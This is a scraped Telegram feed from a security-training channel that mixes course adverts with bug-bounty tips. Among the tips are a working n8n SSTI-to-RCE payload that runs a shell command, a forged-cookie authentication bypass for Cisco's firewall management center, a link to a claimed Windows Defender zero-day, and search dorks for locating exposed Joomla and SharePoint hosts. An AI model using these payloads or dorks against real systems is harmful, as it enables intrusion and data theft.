Brut Security
15.6K subscribers
1.02K photos
82 videos
295 files
1.08K links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: info@brutsec.com
Download Telegram
πŸ”₯ BlueHammer β€” Windows Defender 0-Day Privilege Escalation PoC
βš”οΈ Unpatched Windows Zero-Day Exploit (SYSTEM Access)

πŸ“Œ GitHub Repository
πŸ‘‰ https://github.com/Nightmare-Eclipse/BlueHammer
❀7πŸ‘1
Brut Security
10 Free Coupons - https://topmate.io/saumadip/2009859?coupon_code=awxe
New Contents will be added every month without any extra cost
πŸ”΄ LIVE CLASS ALERT β€” Don't scroll past this.

πŸ’» Brut Security is launching a Practical Web Pentesting Live Class β€” and seats are limited.

πŸ—“οΈ Starts: May 4
🎯 Mode: Online (Live)

──────────────────
πŸ› οΈ What you'll learn:
β€’ SQL Injection, XSS, IDOR, SSRF
β€’ Authentication & Access Control Bypass
β€’ CSRF, File Upload Attacks
β€’ Burp Suite from scratch
β€’ Recon, API Hacking & Reporting
──────────────────

This isn't a pre-recorded course. This is LIVE β€” ask questions, break things in real time, and learn the way actual pentesters do.

βœ… Beginner friendly
βœ… Hands-on labs
βœ… Certificate on completion

πŸ”— Enroll now β†’ http://wa.link/brutsecurity

⚑ Spots fill fast. Don't wait.

#BrutSecurity #WebPentesting #EthicalHacking #BugBounty #Cybersecurity #LiveClass
❀4
🚨 CVE-2026-23898 & CVE-2026-23899: Critical File Deletion and Webservice Flaws Exposed in Joomla.
πŸ‘‡Dorks
HUNTER : http://product.name="Joomla"
❀4
🚨 Bug Bounty Recon Methodology πŸ” 🐞
Link: https://github.com/Maniesh-Neupane/BugBounty-Recon-Methodology
Please open Telegram to view this post
VIEW IN TELEGRAM
❀11
What content/information you're looking for do let me know in comments below. I will try as much possible to share πŸ‘‰
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘3
πŸš€ Summer Batch Announcement – For Students Only

This summer, I’m starting a 1-month live training program focused on:

β€’ Ethical Hacking
β€’ Bug Bounty Hunting
β€’ Web Penetration Testing

πŸŽ“ Students only (Student ID mandatory for enrollment)

πŸ’» Live Classes
πŸ“… Duration: 1 Month
πŸ“œ Certificate included (Ethical Hacking + Web Pentesting)

πŸ’° Price:
β‚Ή4999 (India)
$89 (International)

πŸ“© DM to enroll or get details.
🀨3❀2
🚨 *APIStrike is live!* β€” API Security Scanner by RevoltSecurities

Automate your API pentesting. Point it at an OpenAPI spec, it handles the rest.

*What hits:*
⚑ OWASP API Top 10 coverage
🎯 DAST fuzzing β€” SQLi, XSS, SSRF, SSTI, CMDi & more
πŸ” Auth-aware β€” JWT, Basic, API key, Cookie bypass
πŸ”„ CI/CD gate β€” blocks deploys on critical findings
https://github.com/RevoltSecurities/apistrike
⭐ Star it. Share it. Break APIs legally.
❀5πŸ”₯4
πŸ‘‰πŸ‘‰πŸ‘‰πŸ‘‰Please don’t forget to react to the post and share it. Your reactions motivate us to post more content like this. You can also tap the ⭐️ to show your support. Thanks!πŸ˜‹πŸ˜‹πŸ˜‹
Please open Telegram to view this post
VIEW IN TELEGRAM
2πŸ”₯10❀5
🚨One Liners for bug bounty

βœ… Download: https://github.com/0xPugal/One-Liners
πŸ”₯5❀1πŸ‘1
This media is not supported in your browser
VIEW IN TELEGRAM
Hey Hunter's,
DarkShadow is here back again!

Zero Click Unauthenticated RCE in n8n (CVE-2026-27493)

The chain exploitation method is:
1. Allow User input
2. Render the user input on browser
3. SSTI exploitation e.g. {{7*7}}
4. SSTI to RCE payload e.g.
={{$node["NodeName"].constructor.constructor('return process.mainModule.require("child_process").execSync("id").toString()')()}}


If you guys are really enjoy to read, then show your love ❀️

#rce #ssti #n8n
❀17πŸ‘5
Happy Bengali New Year 1433 🌸

New year. New game.
No excuses this time , only execution.
Build yourself so strong that opportunities start chasing you.

β€” Brut Security πŸ”₯
❀5πŸ™1🀝1
CVE-2026-32201: Microsoft SharePoint Server Spoofing Vulnerability, 6.5 rating ❗️

Improper input validation in Microsoft SharePoint Server allows an unauthorized attacker to perform spoofing over a network and view sensitive internal data or make unauthorized changes. This vulnerability is already being actively exploited in the wild!

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/DjQpd
πŸ‘‰ Dork: http.headers.microsoftsharepointteamservices:*
πŸ‘‰ Dork (MS subdomains filtered): http.headers.microsoftsharepointteamservices:* !host:*.sharepoint.com

Vendor's advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32201
❀3
Hey Hunter’s,
DarkShadow is here back again!

Authentication Bypass via Forged Session Cookie
(Cisco Secure Firewall Management Center)

Analysis:
-checks only for the presence of the CGISESSID cookie.
-but does not validate whether the session ID is legitimate, active, or tied to an authenticated user.

Impact:
an attacker can supply an arbitrary or default value like csm_processes to bypass the redirect to /ui/login and gain unauthorized access to the protected resource.

So Guy’s if you really enjoy to ready such as methods then show your love🀍

#bugbountytips #auth_bypass
❀7πŸ‘3